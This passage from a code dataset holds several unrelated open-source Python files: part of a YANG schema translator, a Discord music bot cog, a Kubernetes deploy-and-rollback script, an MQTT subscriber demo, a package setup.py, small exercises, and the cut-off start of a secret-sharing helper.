qname in p_elem.keys:\n p_elem.keymap[qname] = elem\n elem.occur = 2\n else:\n p_elem.subnode(elem)\n refd, _, _ = self.process_patches(pset, stmt, elem)\n if (p_elem.name == \"choice\" and p_elem.default_case != stmt.arg or\n p_elem.name == \"case\" and\n p_elem.parent.default_case != stmt.parent.arg and\n len(stmt.parent.i_children) < 2):\n\n elem.occur = 3\n elif refd[\"mandatory\"] or stmt.search_one(\"mandatory\", \"true\"):\n self.propagate_occur(elem, 2)\n if elem.occur == 0:\n defv = self.get_default(stmt, refd)\n if defv is not None:\n elem.default = defv\n self.propagate_occur(elem, 1)\n self.handle_substmts(stmt, elem)\n\n def leaf_list_stmt(self, stmt, p_elem, pset):\n lelem = SchemaNode.leaf_list(self.qname(stmt), p_elem)\n lelem.attr[\"nma:leaf-list\"] = \"true\"\n if self.has_meta:\n lelem.annot(\n SchemaNode(\"ref\").set_attr(\"name\", \"__yang_metadata__\"))\n refd, _, _ = self.process_patches(pset, stmt, lelem)\n lelem.minEl, lelem.maxEl = self.get_minmax(stmt, refd)\n if int(lelem.minEl) > 0:\n self.propagate_occur(p_elem, 2)\n self.handle_substmts(stmt, lelem)\n\n def list_stmt(self, stmt, p_elem, pset):\n lelem = SchemaNode.list(self.qname(stmt), p_elem)\n if self.has_meta:\n lelem.annot(\n 
SchemaNode(\"ref\").set_attr(\"name\", \"__yang_metadata__\"))\n keyst = stmt.search_one(\"key\")\n if keyst:\n lelem.keys = [self.add_prefix(k, stmt) for k in keyst.arg.split()]\n refd, augs, new_pset = self.process_patches(pset, stmt, lelem)\n left = self.lookup_expand(stmt, list(new_pset) + lelem.keys)\n for a in augs:\n left = self.lookup_expand(a, left)\n lelem.minEl, lelem.maxEl = self.get_minmax(stmt, refd)\n if int(lelem.minEl) > 0:\n self.propagate_occur(p_elem, 2)\n self.handle_substmts(stmt, lelem, new_pset)\n self.apply_augments(augs, lelem, new_pset)\n\n def must_stmt(self, stmt, p_elem, pset):\n mel = SchemaNode(\"nma:must\")\n p_elem.annot(mel)\n mel.attr[\"assert\"] = self.yang_to_xpath(stmt.arg)\n em = stmt.search_one(\"error-message\")\n if em:\n SchemaNode(\"nma:error-message\", mel, em.arg)\n eat = stmt.search_one(\"error-app-tag\")\n if eat:\n SchemaNode(\"nma:error-app-tag\", mel, eat.arg)\n\n def notification_stmt(self, stmt, p_elem, pset):\n notel = SchemaNode(\"nma:notification\", self.notifications)\n notel.occur = 2\n elem = SchemaNode.element(self.qname(stmt), notel,\n interleave=True, occur=2)\n _, augs, new_pset = self.process_patches(pset, stmt, elem)\n self.handle_substmts(stmt, elem, new_pset)\n self.apply_augments(augs, elem, new_pset)\n\n def reference_stmt(self, stmt, p_elem, pset):\n # ignore imported and top-level descriptions + desc. of enum\n if (self.a_uri in self.namespaces and\n stmt.i_module == self.module != stmt.parent and\n stmt.parent.keyword != \"enum\"):\n self.insert_doc(p_elem, \"See: \" + stmt.arg)\n\n def rpc_stmt(self, stmt, p_elem, pset):\n rpcel = SchemaNode(\"nma:rpc\", self.rpcs)\n _, _, r_pset = self.process_patches(pset, stmt, rpcel)\n inpel = SchemaNode(\"nma:input\", rpcel)\n elem = SchemaNode.element(self.qname(stmt), inpel, occur=2)\n _, augs, pset = self.process_patches(r_pset, stmt, elem, \"input\")\n inst = stmt.search_one(\"input\")\n if inst:\n self.handle_substmts(inst, elem, pset)\n else:\n SchemaNode(\"empty\", elem)\n self.apply_augments(augs, elem, pset)\n _, augs, pset = self.process_patches(r_pset, stmt, None, \"output\")\n oust = stmt.search_one(\"output\")\n if oust or augs:\n outel = SchemaNode(\"nma:output\", rpcel)\n outel.occur = 2\n if oust:\n self.handle_substmts(oust, outel, pset)\n self.apply_augments(augs, outel, pset)\n self.handle_substmts(stmt, rpcel, r_pset)\n\n def type_stmt(self, stmt, p_elem, pset):\n \"\"\"Handle ``type`` statement.\n\n Built-in types are handled by one of the specific type\n callback methods defined below.\n \"\"\"\n typedef = stmt.i_typedef\n if typedef and not stmt.i_is_derived: # just ref\n uname, dic = self.unique_def_name(typedef)\n if uname not in dic:\n self.install_def(uname, typedef, dic)\n SchemaNode(\"ref\", p_elem).set_attr(\"name\", uname)\n defst = typedef.search_one(\"default\")\n if defst:\n dic[uname].default = defst.arg\n occur = 1\n else:\n occur = dic[uname].occur\n if occur > 0:\n self.propagate_occur(p_elem, occur)\n return\n chain = [stmt]\n tdefault = None\n while typedef:\n type_ = typedef.search_one(\"type\")\n chain.insert(0, type_)\n if tdefault is None:\n tdef = typedef.search_one(\"default\")\n if tdef:\n tdefault = tdef.arg\n typedef = type_.i_typedef\n if tdefault and p_elem.occur == 0:\n p_elem.default = tdefault\n self.propagate_occur(p_elem, 1)\n self.type_handler[chain[0].arg](chain, p_elem)\n\n def unique_stmt(self, stmt, p_elem, pset):\n def addpref(nid):\n xpath_nodes = []\n child = stmt.parent\n for node in nid.split(\"/\"):\n 
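# qualify each path component with its module prefix\n                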
prefixed_name = self.add_prefix(node, stmt)\n node_name = prefixed_name\n if \":\" in prefixed_name:\n node_name = prefixed_name.split(\":\")[1]\n if child is not None:\n child = statements.search_child(child.substmts,\n child.i_module.i_modulename,\n node_name)\n if child is None or child.keyword not in [\"choice\", \"case\"]:\n xpath_nodes.append(prefixed_name)\n return \"/\".join(xpath_nodes)\n uel = SchemaNode(\"nma:unique\")\n p_elem.annot(uel)\n uel.attr[\"tag\"] = \" \".join(\n [addpref(nid) for nid in stmt.arg.split()])\n\n def uses_stmt(self, stmt, p_elem, pset):\n expand = False\n grp = stmt.i_grouping\n for sub in stmt.substmts:\n if sub.keyword in (\"refine\", \"augment\"):\n expand = True\n self.add_patch(pset, sub)\n if expand:\n self.lookup_expand(grp, list(pset))\n elif len(self.prefix_stack) <= 1 and not hasattr(stmt,\"d_expand\"):\n uname, dic = self.unique_def_name(\n stmt.i_grouping, not p_elem.interleave)\n if uname not in dic:\n self.install_def(uname, stmt.i_grouping, dic,\n p_elem.interleave)\n elem = SchemaNode(\"ref\", p_elem).set_attr(\"name\", uname)\n occur = dic[uname].occur\n if occur > 0:\n self.propagate_occur(p_elem, occur)\n self.handle_substmts(stmt, elem)\n return\n self.handle_substmts(grp, p_elem, pset)\n\n def when_stmt(self, stmt, p_elem, pset=None):\n p_elem.attr[\"nma:when\"] = self.yang_to_xpath(stmt.arg)\n\n def yang_version_stmt(self, stmt, p_elem, pset):\n if float(stmt.arg) > self.YANG_version:\n raise error.EmitError(\"Unsupported YANG version: %s\" % stmt.arg)\n\n # Handlers for YANG types\n\n def binary_type(self, tchain, p_elem):\n def gen_data():\n return SchemaNode(\"data\").set_attr(\"type\", \"base64Binary\")\n self.type_with_ranges(tchain, p_elem, \"length\", gen_data)\n\n def bits_type(self, tchain, p_elem):\n elem = SchemaNode(\"list\", p_elem)\n zom = SchemaNode(\"zeroOrMore\", elem)\n choi = SchemaNode.choice(zom, occur=2)\n for bit in tchain[0].search(\"bit\"):\n SchemaNode(\"value\", choi, bit.arg)\n\n def boolean_type(self, tchain, p_elem):\n elem = SchemaNode.choice(p_elem, occur=2)\n SchemaNode(\"value\", elem, \"true\")\n SchemaNode(\"value\", elem, \"false\")\n\n def choice_type(self, tchain, p_elem):\n \"\"\"Handle ``enumeration`` and ``union`` types.\"\"\"\n elem = SchemaNode.choice(p_elem, occur=2)\n self.handle_substmts(tchain[0], elem)\n\n def empty_type(self, tchain, p_elem):\n SchemaNode(\"empty\", p_elem)\n\n def identityref_type(self, tchain, p_elem):\n bid = tchain[0].search_one(\"base\").i_identity\n if bid not in self.identity_deps:\n sys.stderr.write(\"%s: warning: identityref has empty value space\\n\"\n % tchain[0].pos)\n p_elem.subnode(SchemaNode(\"notAllowed\"))\n p_elem.occur = 0\n return\n der = self.identity_deps[bid]\n if len(der) > 1:\n p_elem = SchemaNode.choice(p_elem, occur=2)\n for i in der:\n p_elem.subnode(self.add_derived_identity(i))\n\n def instance_identifier_type(self, tchain, p_elem):\n SchemaNode(\"parentRef\", p_elem).attr[\"name\"] = \"__instance-identifier__\"\n ii = SchemaNode(\"nma:instance-identifier\")\n p_elem.annot(ii)\n rinst = tchain[0].search_one(\"require-instance\")\n if rinst:\n ii.attr[\"require-instance\"] = rinst.arg\n\n def leafref_type(self, tchain, p_elem):\n typ = tchain[0]\n occur = p_elem.occur\n pathstr = typ.parent.i_leafref.i_expanded_path\n p_elem.attr[\"nma:leafref\"] = self.yang_to_xpath(pathstr)\n while isinstance(typ.i_type_spec, types.PathTypeSpec):\n typ = typ.i_type_spec.i_target_node.search_one(\"type\")\n self.handle_stmt(typ, p_elem)\n if occur == 
0:\n p_elem.occur = 0\n\n def mapped_type(self, tchain, p_elem):\n \"\"\"Handle types that are simply mapped to RELAX NG.\"\"\"\n SchemaNode(\"data\", p_elem).set_attr(\"type\",\n self.datatype_map[tchain[0].arg])\n\n def numeric_type(self, tchain, p_elem):\n \"\"\"Handle numeric types.\"\"\"\n typ = tchain[0].arg\n def gen_data():\n elem = SchemaNode(\"data\").set_attr(\"type\", self.datatype_map[typ])\n if typ == \"decimal64\":\n fd = tchain[0].search_one(\"fraction-digits\").arg\n SchemaNode(\"param\",elem,\"19\").set_attr(\"name\",\"totalDigits\")\n SchemaNode(\"param\",elem,fd).set_attr(\"name\",\"fractionDigits\")\n return elem\n self.type_with_ranges(tchain, p_elem, \"range\", gen_data)\n\n def string_type(self, tchain, p_elem):\n pels = []\n for t in tchain:\n for pst in t.search(\"pattern\"):\n pels.append(SchemaNode(\"param\",\n text=pst.arg).set_attr(\"name\",\"pattern\"))\n def get_data():\n elem = SchemaNode(\"data\").set_attr(\"type\", \"string\")\n for p in pels:\n elem.subnode(p)\n return elem\n self.type_with_ranges(tchain, p_elem, \"length\", get_data)\n","repo_name":"mbj4668/pyang","sub_path":"pyang/translators/dsdl.py","file_name":"dsdl.py","file_ext":"py","file_size_in_byte":50317,"program_lang":"python","lang":"en","doc_type":"code","stars":504,"dataset":"github-code","pt":"95"} +{"seq_id":"19796011212","text":"import asyncio\n\nimport discord\nfrom core import i18n\nfrom core.cog import SubCog\nfrom core.commands import commandExtra\nfrom discord.ext import commands\nfrom utils.paginator import EmbedPages\n\n\nclass MusicInfo(SubCog, category=\"Player Information\"):\n def __init__(self, bot):\n self.bot = bot\n\n # @music_check(no_channel=True, bot_no_channel=True, same_channel=True, not_playing=True)\n @commandExtra(name='nowplaying', aliases=['np', 'current', 'currentsong'], category=\"Player Information\")\n async def now_playing(self, ctx):\n if not ctx.player.current or not ctx.player.is_playing:\n return await ctx.send(embed=discord.Embed(colour=ctx.embed_color,\n title=_(\"{0} | No song is currently playing!\").format(ctx.emoji.queue)), delete_after=15)\n controller_msg = await ctx.send(embed=ctx.player.main_page)\n\n for reaction in self.controls:\n await controller_msg.add_reaction(str(reaction))\n\n def check(r, u):\n return u.id == ctx.author.id and r.message.id == controller_msg.id\n\n while controller_msg:\n\n try:\n react, user = await self.bot.wait_for('reaction_add', check=check, timeout=60)\n control = self.controls.get(getattr(ctx.emoji, react.emoji.name))\n except asyncio.TimeoutError:\n try:\n await controller_msg.delete()\n except:\n return\n return\n\n try:\n await controller_msg.remove_reaction(react, user)\n except discord.Forbidden:\n pass\n\n if control == 'Main_Page':\n await controller_msg.edit(embed=ctx.player.main_page)\n if control == 'Song_Info_Page':\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color,\n description=_(\"Loading song information...\") + \" <a:discord_loading:587812494089912340>\"))\n await controller_msg.edit(embed=await ctx.player.song_info_page())\n if control == 'Info_Page':\n await controller_msg.edit(embed=ctx.player.info_page)\n if control == 'Delete_Page':\n await controller_msg.delete()\n if control == 'Download_Song':\n if ctx.player.current.length > 300000:\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color, description=_(\"Sorry, I can't download songs longer than 5 minutes...\")))\n\n else:\n check, msg = await ctx.confirm(_(\"This will download an mp3 of this song, are 
you sure you wish to continue?\"), edit=False)\n\n if check:\n await msg.delete()\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color, description=_(\"Downloading your mp3 file...\") + \" <a:discord_loading:587812494089912340>\\n\" + _(\"Please be patient, this may take a while... Bigger songs take longer to download! :)\")))\n await controller_msg.edit(embed=await ctx.player.download_song())\n if not check:\n await msg.delete()\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color, description=_(\"Cancelled mp3 download.\")))\n if control == 'Lyric_Page':\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color, description=_(\"Searching for lyrics...\") + \" <a:discord_loading:587812494089912340>\"))\n try:\n await controller_msg.edit(embed=await ctx.player.lyrics_page())\n except AttributeError:\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color, description=_(\"I was unable to find lyrics for this song.\")))\n\n # @music_check(no_channel=True, bot_no_channel=True, same_channel=True, not_playing=True)\n @commandExtra(name='queue', aliases=['q', 'que'], category=\"Player Information\")\n @commands.cooldown(1, 10, commands.BucketType.user)\n async def _queue(self, ctx):\n upcoming = list(ctx.player.entries)\n if not upcoming:\n return await ctx.send(embed=discord.Embed(colour=ctx.embed_color,\n title=_(\"{0} | No more songs in queue!\").format(ctx.emoji.queue)), delete_after=15)\n\n queue_list = []\n for track in upcoming:\n queue_list.append(f'[**{track.title}**]({track.uri})')\n\n # description=_(\"{0} tracks\").format(len(upcoming)) + f'\\n\\n{queue_list}')\n # embed.set_footer(text=_(\"Viewing page {0}/{1}\").format(page, pages))\n\n paginator = EmbedPages(ctx,\n title=_(\"{0} | Player Queue\").format(ctx.emoji.queue),\n entries=queue_list,\n per_page=10,\n show_entry_count=True)\n\n await paginator.start()\n\n\ndef setup(bot):\n pass\n","repo_name":"iDutchy/Charles","sub_path":"cogs/music/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"72450385272","text":"from typing import Optional\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def __str__(self):\n if self.next:\n return str(self.val) + '>' + str(self.next)\n else:\n return str(self.val)\n\n def __repr__(self):\n return str(self)\n\n\nclass Solution:\n def reverseLinked(self, head: Optional[ListNode]) -> Optional[ListNode]:\n res: Optional[ListNode] = None\n while head:\n p1, head = head, head.next\n p1.next = res\n res = p1\n return res\n\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n slow, fast = head, head\n while fast.next and fast.next.next:\n fast = fast.next.next\n slow = slow.next\n\n pivot = self.reverseLinked(slow.next)\n while pivot:\n if head.val != pivot.val:\n return False\n head = head.next\n pivot = pivot.next\n return True","repo_name":"MaddHatt-PM/cs-and-software-engineering-resources","sub_path":"problems--leetcode/0234-palindrome-linked-list/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31396552771","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\nimport sys\nimport tempfile\nimport time\nimport json\nfrom datetime import datetime\n\nfrom jinja2 import Template\n\n\nclass 
HealthError(Exception):\n \"\"\" This gets thrown if there is something wrong with the health of a service.\"\"\"\n\n\ndef get_options():\n options = {}\n on_flag = \"\"\n for arg in sys.argv:\n if on_flag:\n options[on_flag] = arg\n on_flag = \"\"\n continue\n if arg.startswith('--'):\n on_flag = arg.lstrip('-')\n continue\n if arg == '-f':\n on_flag = '-filename-'\n\n return options\n\n\ndef get_yaml(options):\n filename = options.pop('-filename-', 'k8s-deployment.yaml')\n with open(filename, 'r') as f:\n s = f.read()\n template = Template(s)\n final = template.render(**options)\n return final\n\n\ndef check_health_of_first_pod(deployment):\n results = subprocess.check_output(['kubectl', 'get', 'deployment', deployment, '-o', 'json'])\n deployment_json = json.loads(results.decode())\n\n status = deployment_json.get('status', {})\n\n if (status.get('updatedReplicas') == status.get('availableReplicas')\n and status.get('unavailableReplicas') is None):\n return\n\n labels = [f'{k}={v}' for k, v in\n deployment_json.get('spec', {}).get('selector', {}).get('matchLabels', {}).items()]\n\n count = 0\n for i in range(24): # 24 times is 2 minutes (5 second sleep below)\n command = ['kubectl', 'get', 'pods', '-o', 'json']\n for label in labels:\n command.append(f'-l{label}')\n pod_command = subprocess.check_output(command)\n pods = json.loads(pod_command.decode())\n\n pods = sorted(pods.get('items'),\n key=lambda p: p.get('metadata', {}).get('creationTimestamp'))\n new_pod = pods[-1] # the newest one is the one we care about\n\n pod_details_command = subprocess.check_output(['kubectl', 'get', 'pod', '-o', 'json',\n new_pod.get('metadata').get('name')])\n new_pod = json.loads(pod_details_command.decode())\n\n if new_pod.get('status').get('phase') == 'Running':\n for cond in new_pod.get('status').get('conditions'):\n if cond.get('type') == 'Ready':\n if cond.get('status') == 'True':\n # All is good, continue deployment\n return\n for c in new_pod.get('status').get('containerStatuses'):\n if c.get('state').get('waiting'):\n if c.get('state').get('waiting').get('reason') in ('ImagePullBackOff', 'ErrImagePull'):\n print(\n 'Having trouble pulling the image (ImagePullBackOff)')\n if count > 1:\n print('Rolling Back deploy')\n raise HealthError('Cant get container. Image must be bad.')\n elif c['state']['waiting']['reason'] == 'CrashLoopBackOff':\n print('-- Logs of bad container --')\n pod_logs = subprocess.check_output(\n ['kubectl', 'logs', new_pod['metadata']['name']])\n print(pod_logs.decode())\n raise HealthError('Container not starting up correctly. 
Rolling back.')\n\n print('Waiting for 1st container to become healthy...')\n time.sleep(5)\n count += 1\n try:\n pod_logs = subprocess.check_output(\n ['kubectl', 'logs', new_pod['metadata']['name']])\n try:\n pod_logs = pod_logs.decode()\n except AttributeError:\n # already a str, not bytes\n pass\n print(pod_logs)\n except subprocess.CalledProcessError:\n print('-no pod logs-')\n raise HealthError('Container never went healthy, rolling back.')\n\n\ndef continue_deployment(deployment):\n subprocess.run(['kubectl', 'rollout', 'resume', f'deployment/{deployment}'])\n\n\ndef rollback_deployment(deployment):\n print('-- Rolling back deployment --')\n\n continue_deployment(deployment)\n time.sleep(1)\n subprocess.run(['kubectl', 'rollout', 'undo', f'deployment/{deployment}'])\n\n print(f'-- Rolled Back Deployment @ {datetime.utcnow()} -- ')\n\n\ndef wait_till_complete(deployment):\n subprocess.run(['kubectl', 'rollout', 'status', f'deployment/{deployment}'])\n\n\ndef deploy(filename):\n out = subprocess.check_output(['kubectl', 'apply', '-f', filename])\n print(out.decode())\n deployment = ''\n for line in out.decode().split('\\n'):\n if line.startswith('deployment.apps/'):\n deployment = line[16:].split(' ')[0]\n if deployment:\n time.sleep(2)\n subprocess.run(['kubectl', 'rollout', 'pause', f'deployment/{deployment}'])\n try:\n check_health_of_first_pod(deployment)\n except HealthError as e:\n rollback_deployment(deployment)\n raise SystemExit(str(e))\n else:\n continue_deployment(deployment)\n wait_till_complete(deployment)\n\n\ndef run():\n if os.getenv('KUBECTL_CONFIG'):\n os.makedirs('/root/.kube', exist_ok=True)\n with open('/root/.kube/config', 'w') as f:\n f.write(os.getenv('KUBECTL_CONFIG'))\n\n if os.getenv('CI_ENVIRONMENT_NAME'):\n context = os.getenv('CI_ENVIRONMENT_NAME')\n subprocess.check_output(['kubectl', 'config', 'use-context', context])\n \n options = get_options()\n s = get_yaml(options)\n\n with tempfile.NamedTemporaryFile('w') as f:\n f.write(s)\n f.flush()\n\n deploy(f.name)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"nhumrich/k8s-deploy","sub_path":"scripts/k8s-deploy.py","file_name":"k8s-deploy.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"}
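A minimal, self-contained sketch of the '--flag value' parsing plus Jinja2 rendering pattern that the k8s-deploy script above relies on; the flag names and template string below are illustrative only, not part of that repository:

from jinja2 import Template  # third-party: pip install jinja2

def get_options(argv):
    # mirrors the script's convention: each --flag is followed by its value
    options, on_flag = {}, ""
    for arg in argv:
        if on_flag:
            options[on_flag] = arg
            on_flag = ""
        elif arg.startswith("--"):
            on_flag = arg.lstrip("-")
    return options

if __name__ == "__main__":
    opts = get_options(["--image", "nginx:1.25", "--replicas", "3"])
    print(Template("image={{ image }} replicas={{ replicas }}").render(**opts))
    # prints: image=nginx:1.25 replicas=3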
 +{"seq_id":"2939206865","text":"# Fibonacci numbers module\n\ntest_variable = 100\n\n# write Fibonacci series up to n\ndef fib(n):\n a, b = 0, 1\n while b < n:\n print(b, end=' ')\n a, b = b, a+b\n print()\n","repo_name":"eur-nl/bootcamps","sub_path":"zzzzz_archive/intro/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"41125209386","text":"# Raspberry Pi MQTT subscriber program using the paho client module\n# Inspects each received message and handles it differently\n\nimport paho.mqtt.client as mqtt\n\n# Callback that runs once the client connects to the broker\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n # Subscribe here so the subscriptions are\n # renewed on every (re)connection\n client.subscribe(\"Core/topic1\")\n client.subscribe(\"Core/topic2\")\n\n# Callback that runs whenever a message is received\ndef on_message(client, userdata, msg):\n print(msg.topic+\" \"+str(msg.payload))\n\n if msg.payload.decode() == \"Hello\":\n print(\"Receiving message: #1, do something\")\n\n if msg.payload.decode() == \"World!\":\n print(\"Receiving message #2, do something else\")\n\n# Create the MQTT client object and wire up the callbacks\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"test.mosquitto.org\", 1883, 60) # connect to the broker\n\nclient.loop_forever()","repo_name":"yeolkyu/Python_Network_Programming","sub_path":"13장/mqtt_client_demo.py","file_name":"mqtt_client_demo.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"1839298139","text":"from setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n# Arguments marked as \"Required\" below must be included for upload to PyPI.\n# Fields marked as \"Optional\" may be commented out.\n\nsetup(\n # This is the name of your project. The first time you publish this\n # package, this name will be registered for you. It will determine how\n # users can install this project, e.g.:\n #\n # $ pip install sampleproject\n #\n # And where it will live on PyPI: https://pypi.org/project/sampleproject/\n #\n # There are some restrictions on what makes a valid project name\n # specification here:\n # https://packaging.python.org/specifications/core-metadata/#name\n name='agile', # Required\n\n # Versions should comply with PEP 440:\n # https://www.python.org/dev/peps/pep-0440/\n #\n # For a discussion on single-sourcing the version across setup.py and the\n # project code, see\n # https://packaging.python.org/en/latest/single_source_version.html\n version='0.0.1', # Required\n\n # This is a one-line description or tagline of what your project does. This\n # corresponds to the \"Summary\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#summary\n description='COst Minimization Bed INvErsion model for ice caps and valley glaciers', # Required\n\n # This is an optional longer description of your project that represents\n # the body of text which users will see when they visit PyPI.\n #\n # Often, this is the same as your README, so you can just read it in from\n # that file directly (as we have already done above)\n #\n # This field corresponds to the \"Description\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#description-optional\n long_description=long_description, # Optional\n\n # Denotes that our long_description is in Markdown; valid values are\n # text/plain, text/x-rst, and text/markdown\n #\n # Optional if long_description is written in reStructuredText (rst) but\n # required for plain-text or Markdown; if unspecified, \"applications should\n # attempt to render [the long_description] as text/x-rst; charset=UTF-8 and\n # fall back to text/plain if it is not valid rst\" (see link below)\n #\n # This field corresponds to the \"Description-Content-Type\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#description-content-type-optional\n long_description_content_type='text/markdown', # Optional (see note above)\n\n # This should be a valid link to your project's main homepage.\n #\n # This field corresponds to the \"Home-Page\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#home-page-optional\n url='https://github.com/OGGM/agile', # Optional\n\n # This should be your name or the name of the organization which owns the\n # project.\n author='Patrick Schmitt', # Optional\n\n # This should be a valid email address corresponding to the 
author listed\n # above.\n author_email='patrick.schmitt@uibk.ac.at', # Optional\n\n # Classifiers help users find your project by categorizing it.\n #\n # For a list of valid classifiers, see https://pypi.org/classifiers/\n classifiers=[ # Optional\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Science/Research',\n\n # Pick your license as you wish\n 'License :: OSI Approved :: BSD License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 3',\n ],\n\n # This field adds keywords for your project which will appear on the\n # project page. What does your project relate to?\n #\n # Note that this is a string of words separated by whitespace, not a list.\n keywords=['geosciences', 'glaciers', 'inversion'], # Optional\n\n # You can just specify package directories manually here if your project is\n # simple. Or you can use find_packages().\n #\n # Alternatively, if you just want to distribute a single Python file, use\n # the `py_modules` argument instead as follows, which will expect a file\n # called `my_module.py` to exist:\n #\n # py_modules=[\"my_module\"],\n #\n packages=find_packages(exclude=['tests']), # Required\n\n # This field lists other packages that your project depends on to run.\n # Any package you put here will be installed by pip when your project is\n # installed, so they must be valid existing projects.\n #\n # For an analysis of \"install_requires\" vs pip's requirements files see:\n # https://packaging.python.org/en/latest/requirements.html\n # install_requires=['numpy'], # Optional\n\n # List additional groups of dependencies here (e.g. development\n # dependencies). Users will be able to install these using the \"extras\"\n # syntax, for example:\n #\n # $ pip install sampleproject[dev]\n #\n # Similar to `install_requires` above, these must be valid existing\n # projects.\n extras_require={},\n\n # If there are data files included in your packages that need to be\n # installed, specify them here.\n package_data={ # Optional\n },\n\n # Although 'package_data' is the preferred approach, in some case you may\n # need to place data files outside of your packages. See:\n # http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files\n #\n # In this case, 'data_file' will be installed into '<sys.prefix>/my_data'\n data_files={}, # Optional\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. 
Entry points provide cross-platform support and allow\n # `pip` to create the appropriate form of executable for the target\n # platform.\n #\n # For example, the following would provide a command called `sample` which\n # executes the function `main` from this package when invoked:\n entry_points={\n 'console_scripts': [\n 'run_idealized_experiment = agile1d.sandbox.run_idealized_experiment:main',\n 'pytest.agile1d = agile1d.tests.__main__:main'\n ],\n },\n\n # List additional URLs that are relevant to your project as a dict.\n #\n # This field corresponds to the \"Project-URL\" metadata fields:\n # https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use\n #\n # Examples listed include a pattern for specifying where the package tracks\n # issues, where the source is hosted, where to say thanks to the package\n # maintainers, and where to support the project financially. The key is\n # what's used to render the link text on PyPI.\n project_urls={ # Optional\n 'Bug Reports': 'https://github.com/OGGM/agile/issues',\n 'Source': 'https://github.com/OGGM/agile',\n },\n)\n","repo_name":"OGGM/AGILE","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7313,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"21686989755","text":"from typing import Optional\n\nfrom sqlmodel import Field, Session, SQLModel, create_engine\n\n\nclass Hero(SQLModel, table=True):\n id: Optional[int] = Field(default=None, primary_key=True)\n name: str\n secret_name: str\n age: Optional[int] = None\n\n\nhero_1 = Hero(name=\"Mubarek\", secret_name=\"Kamil\")\n\nengine = create_engine(\"sqlite:///database.db\")\nSQLModel.metadata.create_all(engine)\n\nwith Session(engine) as session:\n session.add(hero_1)\n session.commit()\n","repo_name":"lerime/sqlmodel-hello","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41578972167","text":"from socket import *\nimport time\nimport numpy as np\n\ndef compute_period(timestamps):\n\tdeltas = []\n\tfor i,_ in enumerate(timestamps[:-1]):\n\t\tdeltas.append(timestamps[i+1] - timestamps[i])\n\treturn np.mean(deltas)\n\ns = socket(AF_INET, SOCK_DGRAM)\n\ns.bind(('',9090))\n\nt0 = time.time()\nstamps = []\nwhile True:\n\tdata, addr = s.recvfrom(100)\n\ttd = time.time() - t0\n\tt0 = time.time()\n\tstamps.append(t0)\n\tprint(1/compute_period(stamps[-min(len(stamps), 200):]), 1/td)\n\n","repo_name":"x3medima17/telepresence","sub_path":"web-client/udp_robot.py","file_name":"udp_robot.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"1882426913","text":"import random\nimport string\nimport os\n\nfrom secretsharing import PlaintextToHexSecretSharer\nfrom secretsharing import secret_int_to_points, points_to_secret_int\nfrom base64 import b64decode\nfrom crypto.keys import Keys\nfrom crypto.public import Public\nfrom crypto.private import Private\n\ndef split_secret(data, threshold, num_points):\n splits = []\n split_ints = secret_int_to_points(int.from_bytes(data, byteorder=\"big\"), threshold, num_points)\n for item in split_ints:\n bytes = item[1].to_bytes(32, byteorder=\"big\")\n splits.append(bytes)\n return splits\n\ndef split_random_secret(era_hash, threshold, num_points):\n random = os.urandom(32)\n data = random+era_hash\n return 
